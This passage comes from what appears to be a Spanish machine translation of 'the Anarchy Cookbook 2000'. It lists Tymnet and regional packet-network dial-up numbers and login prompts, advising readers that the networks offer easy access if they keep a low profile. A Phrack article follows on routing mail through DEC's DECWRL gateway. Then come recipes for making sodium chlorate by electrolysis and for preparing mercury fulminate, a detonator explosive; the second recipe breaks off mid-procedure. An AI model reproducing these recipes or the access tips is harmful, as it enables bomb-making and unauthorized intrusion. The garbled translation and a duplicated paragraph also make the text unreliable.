06254 WASHINGTON DIST. DE COL. 300/1200 202/328-0619 @ PDN06254 BETHESDA MARYLAND 300/1200 301/986-9942 @ PDN06254 Colesville MARYLAND 300/2400 301/989-9324 @ PDN06254 Hyattsville MARYLAND 300/1200 301/779-9935 @ PDN06254 LAUREL MARYLAND 300/2400 301/490-9971 @ PDN06254 ROCKVILLE MARYLAND 300/1200 301/340-9903 @ PDN06254 SILVER SPRING MARYLAND 300/1200 301/495-9911 @ PDN07771 Bernardsville NUEVA JERSEY 300/2400 201/766-7138 @ PDN07771 CLINTON NUEVA JERSEY 300-1200 201/730-8693 @ PDN07771 DOVER NUEVA JERSEY 300/2400 201/361-9211 @ PDN07771 Eatontown / Red Bank NUEVA JERSEY 300/2400 201/758-8000 @ PDN07771 ELIZABETH NUEVA JERSEY 300/2400 201/289-5100 @ PDN07771 ENGLEWOOD NUEVA JERSEY 300/2400 201/871-3000 @ PDN07771 FREEHOLD NUEVA JERSEY 300/2400 201/780-8890 @ PDN07771 HACKENSACK NUEVA JERSEY 300/2400 201/343-9200 @ PDN07771 JERSEY CITY NUEVA JERSEY 300/2400 201/659-3800 @ PDN07771 LIVINGSTON NUEVA JERSEY 300/2400 201/533-0561 @ PDN07771 Long Branch / Red Bank NUEVA JERSEY 300/2400 201/758-8000 @ PDN07771 MADISON NUEVA JERSEY 300/2400 201/593-0004 @ PDN07771 METUCHEN NUEVA JERSEY 300/2400 201/906-9500 @ PDN07771 Middletown NUEVA JERSEY 300/2400 201/957-9000 @ PDN07771 MORRISTOWN NUEVA JERSEY 300/2400 201/455-0437 @ PDN07771 NEWARK NUEVA JERSEY 300/2400 201/623-0083 @ PDN07771 NEW BRUNSWICK NUEVA JERSEY 300/2400 201/247-2700 @ PDN07771 Terranova NUEVA JERSEY 300/2400 201/697-9380 @ PDN07771 PASSAIC NUEVA JERSEY 300/2400 201/473-6200 @ PDN07771 PATERSON NUEVA JERSEY 300/2400 201/345-7700 @ PDN07771 Phillipsburg NUEVA JERSEY 300/2400 201/454-9270 @ PDN07771 Pompton Lakes NUEVA JERSEY 300/2400 201/835-8400 @ PDN07771 Red Bank NUEVA JERSEY 300/2400 201/758-8000 @ PDN07771 DE RIDGEWOOD NUEVA JERSEY 300/2400 201/445-4800 @ PDN07771 SOMERVILLE NUEVA JERSEY 300/2400 201/218-1200 @ PDN07771 SUR DEL RÍO NUEVA JERSEY 300/2400 201/390-9100 @ PDN07771 Spring Lake NUEVA JERSEY 300/2400 201/974-0850 @ PDN07771 Toms River NUEVA JERSEY 300/2400 201/286-3800 @ PDN07771 WASHINGTON NUEVA JERSEY 300/2400 201/689-6894 @ PDN07771 WAYNE / PATERSON NUEVA JERSEY 300/2400 201/345-7700 @ PDN03526 ALLENTOWN PENNSYLVANIA 300/1200 215/435-0266 @ PDN11301 ALTOONA PENNSYLVANIA 300/1200 814/946-8639 @ PDN11301 ALTOONA PENNSYLVANIA 2400 814/949-0505 @ PDN03526 Ambler PENNSYLVANIA 300/1200 215/283-2170 @ PDN10672 Ambridge PENNSYLVANIA 300/1200 412/266-9610 @ PDN10672 CARNEGIE PENNSYLVANIA 300/1200 412/276-1882 @ PDN10672 CHARLEROI PENNSYLVANIA 300/1200 412/483-9100 @ PDN03526 Chester Heights PENNSYLVANIA 300/1200 215/358-0820 @ PDN03526 Coatesville PENNSYLVANIA 300/1200 215/383-7212 @ PDN10672 Connellsville PENNSYLVANIA 300/1200 412/628-7560 @ PDN03526 Downington / Coates. PENNSYLVANIA 300/1200 215/383-7212 @ PDN03562 Doylestown PENNSYLVANIA 300/1200 215/340-0052 @ PDN03562 GERMANTOWN PENNSYLVANIA 300/1200 215-843-4075 @ PDN10672 Glenshaw PENNSYLVANIA 300/1200 412/487-6868 @ PDN10672 Greensburg PENNSYLVANIA 300/1200 412/836-7840 @ PDN11301 HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @ PDN11301 HARRISBURG PENNSYLVANIA 2400 717/238-0450 @ PDN10672 INDIANA PENNSYLVANIA 300/1200 412/465-7210 @ PDN03526 King Of Prussia PENNSYLVANIA 300/1200 215/270-2970 @ PDN03526 KIRKLYN PENNSYLVANIA 300/1200 215/789-5650 @ PDN03526 LANSDOWNE PENNSYLVANIA 300/1200 215/626-9001 @ PDN10672 LATROBE PENNSYLVANIA 300/1200 412/537-0340 @ PDN11301 LeMoyne / HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @ PDN10672 McKeesport PENNSYLVANIA 300/1200 412/673-6200 @ PDN10672 NEW CASTLE PENNSYLVANIA 300/1200 412/658-5982 @ PDN10672 New Kensington PENNSYLVANIA 300/1200 412/337-0510 @ PDN

Page 172: 106652012 the Anarchy Cookbook 2000 Es

03526 NORRISTOWN PENNSYLVANIA 300/1200 215/270-2970 @ PDN03526 PAOLI PENNSYLVANIA 300/1200 215/648-0010 @ PDN03562 FILADELFIA PENNSYLVANIA 300/1200 215/923-7792 @ PDN03562 FILADELFIA PENNSYLVANIA 300/1200 215/557-0659 @ PDN03562 FILADELFIA PENNSYLVANIA 300/1200 215/545-7886 @ PDN03562 FILADELFIA PENNSYLVANIA 300/1200 215/677-0321 @ PDN03562 FILADELFIA PENNSYLVANIA 2400 215/625-0770 @ PDN10672 PITTSBURGH PENNSYLVANIA 300/1200 412/281-8950 @ PDN10672 PITTSBURGH PENNSYLVANIA 300/1200 412-687-4131 @ PDN10672 PITTSBURGH PENNSYLVANIA 2400 412/261-9732 @ PDN10672 POTTSTOWN PENNSYLVANIA 300/1200 215/327-8032 @ PDN03526 Quakertown PENNSYLVANIA 300/1200 215/538-7032 @ PDN03526 LECTURA PENNSYLVANIA 300/1200 215/375-7570 @ PDN10672 ROCHESTER PENNSYLVANIA 300/1200 412/728-9770 @ PDN03526 SCRANTON PENNSYLVANIA 300/1200 717/348-1123 @ PDN03526 SCRANTON PENNSYLVANIA 2400 717/341-1860 @ PDN10672 SHARON PENNSYLVANIA 300/1200 412/342-1681 @ PDN03526 Tullytown PENNSYLVANIA 300/1200 215/547-3300 @ PDN10672 UNIONTOWN PENNSYLVANIA 300/1200 412/437-5640 @ PDN03562 Valley Forge PENNSYLVANIA 300/1200 215/270-2970 @ PDN10672 WASHINGTON PENNSYLVANIA 300/1200 412/223-9090 @ PDN03526 WAYNE PENNSYLVANIA 300/1200 215/341-9605 @ PDN10672 Wilkinsburg PENNSYLVANIA 300/1200 412/241-1006 @ PDN06254 ALEJANDRÍA VIRGINIA 300/1200 703/683-6710 @ PDN06254 ARLINGTON VIRGINIA 300/1200 703/524-8961 @ PDN06254 FAIRFAX VIRGINIA 300/1200 703/385-1343 @ PDN06254 MCLEAN VIRGINIA 300/1200 703/848-2941 @ PDN

@ PDN Bell Atlantic - NOMBRE DE LA RED ES PÚBLICO red de datos (PDN)

(Mensaje de conexión) . _. _. _ <_C _r _> _ (SIMULTANEA velocidades de datos)

BIENVENIDOS A LA PDN BPA / DST

*. _T __ <_C _R _> _ (DIRECCIÓN TYMNET)

131069 (confirmación de la dirección - TYMNET CIRD) COM (confirmación de establecimiento de llamada)

-GDA-0xxxx TYMNET: identificado: (HOST # DENTRO DE GUIONES)

BELL SOUTHNODO CIUDAD ESTADO DENSIDAD Número de AccesoMODEM10207 ATLANTA GEORGIA 300/1200 404/261-4633 @ PLSK10207 ATENAS GEORGIA 300/1200 404/354-0614 @ PLSK10207 COLÓN GEORGIA 300/1200 404/324-5771 @ PLSK10207 ROMA GEORGIA 300/1200 404/234/7542 @ PLSK

@ PLSK BellSouth - NOMBRE DE LA RED ES PULSELINK

(Mensaje de conexión)

. _. _. __ <_C _r _> _ (SIMULTANEA velocidades de datos) (NO SE ECHO A LA TERMINAL) CONECTADOS PULSELINK

1 _1 _3 _0 _6 _ (DIRECCIÓN TYMNET) (NO SE ECHO A LA TERMINAL)

Page 173: 106652012 the Anarchy Cookbook 2000 Es

PULSELINK: llamada conectada a un 3106

-GDA-0xxxx TYMNET: identificado: (HOST # DENTRO DE GUIONES)

Pacific BellNODO CIUDAD ESTADO DENSIDAD Número de AccesoRED03306 BERKELEY CALIFORNIA 300/1200 415-548-2121 @ PPS06272 EL SEGUNDO CALIFORNIA 300/1200 213-640-8548 @ PPS06272 FULLERTON CALIFORNIA 300/1200 714-441-2777 @ PPS06272 INGLEWOOD CALIFORNIA 300/1200 213-216-7667 @ PPS06272 ANGELES (CENTRO) CALIFORNIA 300/1200 213-687-3727 @ PPS06272 LOS ANGELES CALIFORNIA 300/1200 213-480-1677 @ PPS03306 MOUNTAIN VIEW CALIFORNIA 300/1200 415-960-3363 @ PPS03306 OAKLAND CALIFORNIA 300/1200 415-893-9889 @ PPS03306 PALO ALTO CALIFORNIA 300/1200 415-325-4666 @ PPS06272 PASADENA CALIFORNIA 300/1200 818-356-0780 @ PPS03306 SAN FRANCISCO CALIFORNIA 300/1200 415-543-8275 @ PPS03306 SAN FRANCISCO CALIFORNIA 300/1200 415-626-5380 @ PPS03306 SAN FRANCISCO CALIFORNIA 300/1200 415-362-2280 @ PPS03306 SAN JOSE CALIFORNIA 300/1200 408-920-0888 @ PPS06272 SANTA ANNA CALIFORNIA 300/1200 714-972-9844 @ PPS06272 Van Nuys CALIFORNIA 300/1200 818-780-1066 @ PPS

@ PPS Pacific Bell - nombre de red está conmutación de paquetes (PPS)

(Mensaje de conexión)

. _. _. _ <_C _r _ (SIMULTANEA velocidades de datos) (NO SE ECHO A LA TERMINAL)

LÍNEA 1200 BIENVENIDOS A PPS: 415-XXX-XXXX 1 _1 _3 _0 _6 _9 _ (DIRECCIÓN TYMNET) (NO ECHO, hasta que TYMNET RESPONDE)

-GDA-0xxxx TYMNET: identificado: (HOST # DENTRO DE GUIONES)

Sur de Nueva InglaterraNODO CIUDAD ESTADO DENSIDAD NÚMEROS DE ACCESO RED02727 BRIDGEPORT CONNECTICUT 300/2400 203/366-6972 @ CONNNET02727 BRISTOL CONNECTICUT 300/2400 203/589-5100 @ CONNNET02727 CANAÁN CONNECTICUT 300/2400 203/824-5103 @ CONNNET02727 CLINTON CONNECTICUT 300/2400 203/669-4243 @ CONNNET02727 DANBURY CONNECTICUT 300/2400 203/743-2906 @ CONNNET02727 DANIELSON CONNECTICUT 300/2400 203/779-1880 @ CONNNET02727 HARTFORD / Middletown CONNECTICUT 300/2400 203/724-6219 @ CONNNET02727 MERIDEN CONNECTICUT 300/2400 203/237-3460 @ CONNNET02727 NEW HAVEN CONNECTICUT 300/2400 203/776-1142 @ CONNNET02727 NEW LONDON CONNECTICUT 300/2400 203/443-0884 @ CONNNET02727 New Milford CONNECTICUT 300/2400 203/355-0764 @ CONNNET02727 NORWALK CONNECTICUT 300/2400 203/866-5305 @ CONNNET02727 VIEJO GREDDWICH CONNNETICUT 300/2400 203/637-8872 @ CONNNET02727 Old Saybrook CONNECTICUT 300/2400 203/388-0778 @ CONNNET02727 SEYMOUR CONNECTICUT 300/2400 203/881-1455 @ CONNNET02727 STAMFORD CONNECTICUT 300/2400 203/324-9701 @ CONNNET02727 Storrs CONNECTICUT 300/2400 203/429-4243 @ CONNNET02727 TORRINGTON CONNECTICUT 300/2400 203/482-9849 @ CONNNET02727 WATERBURY CONNECTICUT 300/2400 203/597-0064 @ CONNNET02727 WILLIMANTIC CONNECTICUT 300/2400 203/456-4552 @ CONNNET02727 WINDSOR CONNECTICUT 300/2400 203/688-9330 @ CONNNET02727 WINDSOR LCKS / ENFIELD CONNECTICUT 300/2400 203/623-9804 @ CONNNET

@ CONNNET - sur de Nueva Inglaterra TELEFONO - RED DE NOMBRE EN CONNNET

Page 174: 106652012 the Anarchy Cookbook 2000 Es

(Mensaje de conexión)

H_ H_ <_ C_ R_> SIMULTANEA (velocidades de datos) (NO SE ECHO A LA TERMINAL) CONNNET

. _ T_ <_ C_ _ R_> (deberán ser mayúsculas)

26-Sep-88 18:33 (DATA) 031069 (confirmación de la dirección) COM (confirmación de establecimiento de llamada)

-GDA-OXXXX TYMNET: POR FAVOR ENTRAR:

Southwestern BellNODO CIUDAD ESTADO DENSIDAD NÚMEROS DE ACCESORED05443 KANSAS CITY KANSAS 300/1200 316/225-9951 @ MRLK05443 HAYS KANSAS 300/1200 913/625-8100 @ MRLK05443 HUTCHINSON KANSAS 300/1200 316/669-1052 @ MRLK05443 LAWRENCE KANSAS 300/1200 913/841-5580 @ MRLK05443 MANHATTAN KANSAS 300/1200 913/539-9291 @ MRLK05443 PARSONS KANSAS 300/1200 316/421-0620 @ MRLK05443 SALINA KANSAS 300/1200 913/825-4547 @ MRLK05443 TOPEKA KANSAS 300/1200 913/235-1909 @ MRLK05443 WICHITA KANSAS 300/1200 316/269-1996 @ MRLK04766 Bridgeton / ST. LOUIS MISSOURI 300/1200 314/622-0900 @ MRLK04766 ST. LOUIS MISSOURI 300/1200 314/622-0900 @ MRLK

En una nota lateral, el reciente libro El huevo del cuco proporciona alguna información interesante (en forma de una historia, sin embargo) en un hacker Tymnet. Recuerda que él estaba metido en cosas grandes, y por lo tanto se le reprimió al. Si usted mantiene un perfil bajo, las redes deben proporcionar un método fácil acceso.

Si usted puede encontrar un sistema que está conectado a Internet que usted puede conseguir desde Tymnet, lo estás haciendo bien.

129.Phrack Magazine - vol. 3, Número 30 por enlace dedicado

INTRODUCCIÓNDECWRL es una computadora gateway de correo operado por el Laboratorio de Investigación de Western Digital en Palo Alto, California. Su propósito es apoyar el intercambio de correo electrónico entre digital y el "mundo exterior".

DECWRL está conectado a Easynet digital, y también a un número de diferentes redes externas de correo electrónico. Los usuarios digitales se pueden enviar correo fuera mediante el envío de DECWRL :: "fuera de dirección", y los usuarios digitales también pueden recibir el correo por tener su ruta a través de corresponsales DECWRL. Los detalles de los mensajes entrantes son más complejas, y se discuten a continuación.

Es de vital importancia que los empleados que sean buenos ciudadanos digitales de las redes a las que estamos conectados. Ellos dependen de la integridad de nuestra comunidad de usuarios para asegurarse de que el endurecimiento de los controles sobre el uso de la puerta de entrada no son necesarios. La regla más importante es "no hay cartas en cadena", pero hay otras reglas en función de si la red conectada que está utilizando es comercial o no comercial.

El volumen de tráfico actual (septiembre de 1989) es de unos 10.000 mensajes de correo por día y cerca de 3.000 mensajes de USENET por día. El tráfico de correo por puerta de enlace se ha duplicado cada año desde 1983. DECWRL es actualmente un VAX 8530 equipo con 48 megabytes de memoria principal, 2500 megabytes de espacio en disco, 8 de 9600 baudios (Telebit) los puertos del módem y las conexiones de red diferentes. Dentro de

Page 175: 106652012 the Anarchy Cookbook 2000 Es

poco va a actualizar a un sistema de Vax 8650. Corren Ultrix 3.0 como sistema operativo base.

ADMINISTRACIÓNEl portal cuenta con un personal de ingeniería, pero no hay personal administrativo o de oficina. Ellos trabajan duro para que siga funcionando, pero no tienen los recursos para responder a las consultas telefónicas o proporcionar tutoriales en su uso.

Publican informes periódicos de estado a la dec.general grupo de noticias USENET. Varias personas que por lo general útiles copiar estos informes a los VAXNOTES "puertas" de la conferencia dentro de un día o dos.

Cómo enviar correoDECWRL está conectado a un buen número de redes de correo diferentes. Si usted fueraconectado directamente a ella, puede escribir las direcciones directamente, por ejemplo,

Para: Dirección extraña extranjera!.

Pero ya que usted no está conectado directamente a la puerta de entrada, usted debe enviar el correo, para que cuando llegue a la puerta de entrada, que se enviará como si esa dirección había sido escrita a nivel local.

* El envío de VMS

Si usted es un usuario VMS, debe utilizar NMAIL, porque el correo VMS no sabe cómo reencolar y vuelva a intentarlo electrónico cuando la red está congestionada o desconectado. Desde VMS, frente a su correo de esta manera:

Para:% nm DECWRL :: "! Extraña extranjera dirección"

Los caracteres de comillas (") son importantes, para asegurarse de que el SLB no tratar de interpretar extraño! Extranjero! Dirigirse. Si usted está escribiendo, como una dirección dentro de un programa de correo electrónico, que funciona como se anuncia. Si está utilizando DCL y escribiendo directamente a la línea de comandos, usted debe tener cuidado de que DCL le gusta Elimine las comillas, por lo que tendrá que incluir la dirección completa entre comillas, y luego poner dos citas en cada lugar que una cita deben aparecer en la dirección:

$ Test.msg electrónico "nm% DECWRL ::" "extranjero! Addr" "" / subj = "hola"

Tenga en cuenta las tres citas seguidas después de la extranjera! Dir. El primero dos de ellos se duplicó para producir una sola cotización en la dirección, y la tercera termina la misma dirección (equilibrar la cita frente al% nm).

Estas son algunas direcciones de correo típico de salida tal como se utiliza en un sistema VMS:

Para:% nm DECWRL :: "! III-winkin NetSys Phrack" Para: DECWRL nm% :: "[email protected]" Para: DECWRL nm% :: "NetSys [email protected]!" Para: DECWRL nm% :: "[email protected]" Para: DECWRL nm% :: "Chris.Jones @ f654.n987.z1.fidonet.org"

* El envío de Ultrix

Si su sistema Ultrix se ha configurado para ello, entonces se puede, de su sistema Ultrix, basta con enviar directamente a la dirección en el extranjero, y el software de correo electrónico se hará cargo de todos los de la puerta de entrada de enrutamiento

Page 176: 106652012 the Anarchy Cookbook 2000 Es

para usted. La mayoría de los sistemas de ULTRIX en la investigación empresarial y en el grupo de Palo Alto se configuran de esta manera.

Para averiguar si su sistema ha sido tan Ultrix configurado, sólo intentarlo y ver qué pasa. Si no funciona, usted recibirá una notificación casi al instante.

NOTA: El sistema de correo Ultrix es extremadamente flexible, sino que está casi totalmente configurable por el cliente. Si bien esto es muy valiosa para los clientes, hace que sea muy difícil de escribir las instrucciones globales para el uso de anuncios publicitarios ULTRIX, porque es posible que los cambios locales se han producido algo muy diferente a la aplicación de correo del proveedor entregado. Uno de los cambios populares es jugar con el significado de las comillas (") en las direcciones de ULTRIX Algunos sistemas consideran que estas dos direcciones son las mismas.:

sitio1! sitio2! [email protected]

y

"Sitio1! Sitio2! Usuario" @ host.dec.com

mientras que otros están configurados de manera que una forma va a funcionar y el otro no. Todos estos ejemplos utilizan las comillas. Si usted tiene problemas para obtener los ejemplos a trabajar, por favor intente de nuevo sin las comillas. Tal vez su sistema Ultrix está interpretando las comillas de forma diferente.

Si su sistema tiene Ultrix un enlace IP de Palo Alto (tipo "/ etc / decwrl.dec.com ping" para averiguar si lo hace), entonces usted puede dirigir su correspondencia a la puerta de entrada a través de IP. Esto tiene la ventaja de que los encabezados de correo ULTRIX se llega a la puerta de entrada directa, en lugar de ser traducido a los encabezados de correo DECnet y luego de nuevo en Ultrix en el otro extremo. Hacer esto como sigue:

Para: "alienígena dirección" @ decwrl.dec.com

Las comillas son necesarias sólo si la dirección contiene un alienígena! carácter, pero que no se lastimen si se utilizan innecesariamente. Si la dirección contiene un alienígena carácter "@", tendrá que convertirlo en un carácter "%". Por ejemplo, para enviar a través de IP a [email protected], debe abordar el correo.

Para: "widget.org% joe" @ decwrl.dec.com

Si su sistema tiene Ultrix sólo un eslabón DECNET a Palo Alto, entonces usted debe tratar de correo en la misma forma que los usuarios de VMS, salvo que no se debe poner el% nm frente a la dirección:

Para: DECWRL :: "! Extraña extranjera dirección"

Estas son algunas direcciones de correo de salida típica que se utiliza de un sistema de Ultrix que tenga acceso a la propiedad intelectual. ULTRIX sistemas que carecen de acceso IP debe usar la misma sintaxis que los usuarios de VMS, salvo que el% nm en el frente de la dirección no debe ser utilizado.

Para: @ decwrl.dec.com "III-winken NetSys phrack!" Para: "msp.pnet.sc.edu% del administrador de correo" @ decwrl.dec.com Para: "phrackserv% CUNYVM.bitnet" @ decwrl.dec.com Para: "¡NetSys phrack% uunet.uu.net" @ decwrl.dec.com Para: "Chris.Jones @ f654.n987.z1.fidonet.org" @ decwrl.dec.com

DETALLES DE LA UTILIZACIÓN DE OTRAS REDESTodas las redes de computadoras del mundo están conectados entre sí, más o menos, así que es difícil establecer límites precisos entre ellos. Precisamente, en la que Internet comienza y termina UUCP es una cuestión de interpretación.

Page 177: 106652012 the Anarchy Cookbook 2000 Es

Para fines de envío de correo, sin embargo, es conveniente dividir el universo de red en estas categorías:

Easynet:La red interna de DECNET Digital. Se caracteriza por las direcciones de la forma de NODO :: usuario. Easynet se puede utilizar para fines comerciales.

Internet:Una colección de redes, incluida la antigua ARPANET, la NSFNET, CSNET, y otros. La mayoría de la investigación internacional, el desarrollo y las organizaciones educativas están conectados de alguna manera a Internet. Se caracteriza por las direcciones de la forma [email protected]. La propia Internet no puede ser usado para fines comerciales.

UUCP:Una red muy primitiva, sin gestión, construido con auto-dialers llaman por teléfono a un ordenador desde otro. Se caracteriza por las direcciones de la place1 forma! Place2! De los usuarios. La red UUCP puede ser usada para fines comerciales, siempre que ninguno de los sitios a través del cual se enrutan el mensaje se opone a eso.

USENET:No es una red en absoluto, sino una capa de software integrado en la parte superior de UUCP e Internet.

BITNET:Una red de IBM basado en la vinculación principalmente sitios educativos. Los usuarios digitales puede enviar a BITNET como si fuera parte de Internet, pero los usuarios de BITNET necesitar instrucciones especiales para revertir el proceso. BITNET no se puede utilizar para fines comerciales.

Fidonet:Una red de computadoras personales. No estoy seguro de la condición de uso de Fidonet con fines comerciales, ni estoy seguro de su eficacia.

DOMINIOS Y dirección de dominioHay una red particular que se llama "Internet," que es algo relacionado con lo que solía ser "la ARPAnet." El estilo de hacer frente a Internet es lo suficientemente flexible que la gente lo use para hacer frente a otras redes, así, con el resultado que es muy difícil mirar en una dirección y decirle exactamente lo que la red es probable que atravesar. Pero la frase "dirección de Internet" no significa "dirección de correo electrónico de algún ordenador en Internet", sino "dirección de correo electrónico en el estilo utilizado por la Internet". La terminología es aún más confusa, porque la palabra "dirección" significa una cosa para la gente que construye las redes y algo totalmente diferente a las personas que los utilizan. En este archivo de una "dirección" es algo así como "[email protected]" y no "192.1.24.177" (que es lo que los ingenieros de red llamaría una "dirección de Internet").

El esquema de nombres de dominios de Internet utiliza jerárquicos, que a pesar de su título son sólo un truco de contabilidad. Realmente no importa si usted dice NODO :: usuario o usuario @ NODO, pero lo que sucede cuando se conecta las redes de ambas compañías en conjunto y ambos tienen un nodo de ANCLA? Usted debe, de alguna manera, especifique cuál es el ancla que te refieres. Se podría decir ANCHOR.DEC :: USUARIO o DEC.ANCHOR :: USUARIO o [email protected] o [email protected]. La convención de Internet, es decir [email protected], con el propietario (diciembre) después del nombre (ANCLA).

Pero podría haber varias organizaciones nombradas diciembre Usted podría tener Digital Equipment Corporation o Abajo College East o el Comité de Educación de Personas con Discapacidad. La técnica que utiliza el sistema de Internet para resolver los conflictos de este tipo es tener dominios jerárquicos. Un dominio de lo normal no es diciembre o Stanford, pero DEC.COM (comercial) y STANFORD.EDU (educativo). Estos

Page 178: 106652012 the Anarchy Cookbook 2000 Es

dominios se pueden dividir en ZK3.DEC.COM o CS.STANFORD.EDU. Esto no resuelve los conflictos por completo, sin embargo: tanto en la Central Michigan University y la Universidad de Carnegie-Mellon podía pretender ser CMU.EDU. La regla es que el propietario del dominio EDU puede decidir, al igual que el dueño de la CMU.EDU puede decidir si el departamento de Ingeniería Eléctrica o el departamento de Educación Primaria se EE.CMU.EDU subdominio.

El esquema de dominio, aunque no es perfecto, es completamente extensible. Si usted tiene dos direcciones que potencialmente pueden entrar en conflicto, puede sufijo algún dominio hasta el final de ellos, por lo tanto, por ejemplo, decwrl.UUCP ser de alguna manera diferente de DECWRL.ENET.

Sistema de correo de todo el DECWRL se organiza de acuerdo a los dominios de Internet, y de hecho en que manejamos todo el correo interno, como si se tratara de correo de Internet. El correo entrante se convierte en el correo de Internet, y luego es dirigido al dominio apropiado, si ese dominio requiere cierta conversión, entonces el correo se convierte a los requisitos del dominio saliente a medida que pasa a través de la puerta de enlace. Por ejemplo, poner el correo de Easynet en el NE de dominio.

En una nota lateral, el reciente libro El huevo del cuco proporciona alguna información interesante (en forma de una historia, sin embargo) en un hacker Tymnet. Recuerda que él estaba metido en cosas grandes, y por lo tanto se le reprimió al. Si usted mantiene un perfil bajo, las redes deben proporcionar un método fácil acceso.

Si usted puede encontrar un sistema que está conectado a Internet que usted puede conseguir desde Tymnet, lo estás haciendo bien.

Nombre de usuario @ f <node #>. N <net #>. Z zona> #>. Ifna.org

En otras palabras, si quería enviar a Silicon Estafador en 1:135 / 5, la dirección sería [email protected] y, siempre que su programa de correo del dominio ifna.org sabe., Lo que debería conseguir a través de bien. Al parecer, a partir de la redacción de este artículo, han puesto en práctica un nombre nuevo portal llamado fidonet.org que deben trabajar en lugar de ifna.org en todas las rutas. Si su programa de correo no conoce ninguno de estos dominios, utilice la ruta anterior, pero sustituir a la primera "@" con un "%" y luego después, utilice uno de los anuncios publicitarios siguientes después de la "@": CS.ORST.EDU o K9 . CS.ORST.EDU (es decir, nombre de usuario% f <node #>. n <net #>. z zona> #>. fidonet.org @ CS.ORST.EDU [o reemplazar CS.ORST.EDU con K9.CS. ORST.EDU]).

La siguiente es una lista compilada por Bill Fenner ([email protected]) que se publicó, el INFONETS COMPENDIO que enumera una serie de pasarelas de FidoNet:

Neto Nodo Nombre de nodo104 56 milehi.ifna.org105 55 casper.ifna.org107 320 rubbs.ifna.org109 661 blkcat.ifna.org125 406 fidogate.ifna.org128 19 hipshk.ifna.org129 65 insight.ifna.org143 N / A fidogate.ifna.org152 200 castle.ifna.org161 N / A fidogate.ifna.org369 17 megasys.ifna.org

NOTA: El nombre de UUCP nodo equivalente es la primera parte del nombre del nodo. En otras palabras, el nodo UUCP milehi aparece como milehi.ifna.org, pero pueden ser enviados directamente por la red UUCP.

Otra forma de enviar por correo a FidoNet, específicamente para la gente de internet, es en este formato:

Page 179: 106652012 the Anarchy Cookbook 2000 Es

ihnp4! necntc! ncoast! ohiont! <net #>! <node #>! [email protected]

Y para aquellas personas de correo UUCP por ahí, sólo tiene que utilizar la trayectoria descrita e ignoran la parte [email protected]. Hay una NODELIST FIDONET disponible en la mayoría de cualquier tablón de anuncios de FidoNet, pero es bastante grande.

ONTYMEAnteriormente conocido como Tymnet, OnTyme es la revisión de McDonnell Douglas. Después de que se compró Tymnet, cambiaron el nombre de la empresa y abrió un portal de Internet experimental en ONTYME.TYMNET.COM pero esto es supuestamente sólo es bueno para ciertas direcciones corporativas dentro de McDonnell Douglas y Tymnet, no sus clientes. El formato de identificador de usuario es xx.yyy o xx.y / aa donde xx es un nombre de red y yyy (o Y / año) es un nombre de usuario real. Si usted no puede clavar directamente esto, trate de:

ONTYME.TYM% xx.yyy

130.Sodium clorato por el Jolly Roger

El clorato de sodio es un fuerte oxidante utilizado en la fabricación de explosivos. Se puede utilizar en lugar de clorato de potasio.

Material necesario:• 2 carbono o plomo varillas (1 pulgada de diámetro por 5 cm de longitud)• La sal o el agua del océano• El ácido sulfúrico, se diluyó• Automóvil• Agua• 2 hilos, calibre 16 (3/64 pulgadas de diámetro aprox.), 6 pies de largo,

aislado.• Gasolina• 1 galón frasco de vidrio de boca ancha (5 pulgadas de diámetro por 6 pulgadas

de alto aprox.)• Palos• Cadena• Cucharadita• Bandejas• Copa• Una tela gruesa• Cuchillo• Olla grande o una bandeja plana

Las fuentes de carbono o las barras de plomo:• Las pilas (2 - ½ pulgadas de diámetro por 7 "de largo) o tienda de suministros de

plomería.

Las fuentes de agua salada:• Tienda de comestibles o en el mar

Fuentes de ácido sulfúrico:• Motor baterías de vehículos.

Procedimiento:1. Mezcle ½ taza de sal en el frasco de vidrio de un galón con 3 litros (3 cuartos de

galón) de agua.2. Añadir 2 cucharaditas de ácido de batería a la solución y se agita vigorosamente

durante 5 minutos.3. Pele aproximadamente 4 pulgadas de aislamiento de ambos extremos de los dos cables.

Page 180: 106652012 the Anarchy Cookbook 2000 Es

4. Con cuchillo y palos, la forma 2 tiras de madera de 1 por 1/8 a 1 - ½. Ate los listones de madera para el plomo o varillas de carbono de modo que sean 1 - ½ pulgadas de separación.

5. Conectar las varillas a la batería en un vehículo de motor con el cable aislado.6. Sumergir 4 - ½ pulgadas de las barras en la solución de agua salada.7. Con cambio en punto muerto, marcha el motor del vehículo. Pisar el acelerador de

aprox. 1/5 de su carrera completa.8. Haga funcionar el motor con el acelerador en esta posición durante 2 horas, a

continuación, apagarlo durante 2 horas.9. Repitiendo este ciclo durante un total de 64 horas mientras se mantiene el nivel de

la solución de agua-ácido de sal en el frasco de vidrio.

PRECAUCIÓN: Este dispositivo cuenta con voltajes que pueden ser bastante peligroso!No toque los cables pelados de cables mientras el motor está funcionando!

10. Apague el motor. Retirar las varillas desde el frasco de vidrio y desconectar los cables de alambre de la batería.

11. Se filtra la solución a través de la tela gruesa en un molde plano o bandeja, dejando el sedimento en el fondo del frasco de vidrio.

12. Permitir que el agua en la solución filtrada se evapore a temperatura ambiente (aprox. 16 horas). El residuo es aproximadamente 60% o más de clorato de sodio, que es lo suficientemente puro para ser usado como un ingrediente explosivo.

131.Mercury Fulminate por la Jolly Roger

Fulminato de mercurio se utiliza como un explosivo primario en la fabricación de detonadores. Es para ser utilizado con un explosivo de refuerzo, tal como ácido pícrico o RDX (que son otra parte de este libro de cocina).

Material necesario:• Ácido nítrico, el 90% conc. (1,48 sp. G)• Mercurio• Etílico (grano) de alcohol (90%)• Material filtrante [toallas de papel]• Medida de cucharadita (¼, ½, y 1 cdta. De capacidad) de aluminio, acero inoxidable

o recubierto de cera• Fuente de calor• Palo limpio• El agua limpia• Los envases de vidrio• Cinta• Jeringa

Fuente de ácido nítrico:• En otras partes de este libro de cocina• Los procesadores industriales de metal

Fuente de Mercurio:• Termómetros• Interruptores de mercurio• Tubos viejos de radio

Procedimiento:1. Diluir 5 cucharaditas de ácido nítrico con 2 - ½ cucharaditas de agua limpia en un

recipiente de vidrio mediante la adición del ácido al agua.2. Disolver 1/8 cucharadita de mercurio en el ácido nítrico diluido. Esto dará lugar a

oscuras humos rojos. NOTA: Puede ser necesario añadir agua, el gota a la vez, a la solución de mercurio-ácido con el fin de iniciar una reacción.

Page 181: 106652012 the Anarchy Cookbook 2000 Es

• ATENCION: El ácido se quema la piel y destruir las prendas de vestir. Si alguno se derrama, lavar con una gran cantidad de agua. No respirar los vapores!

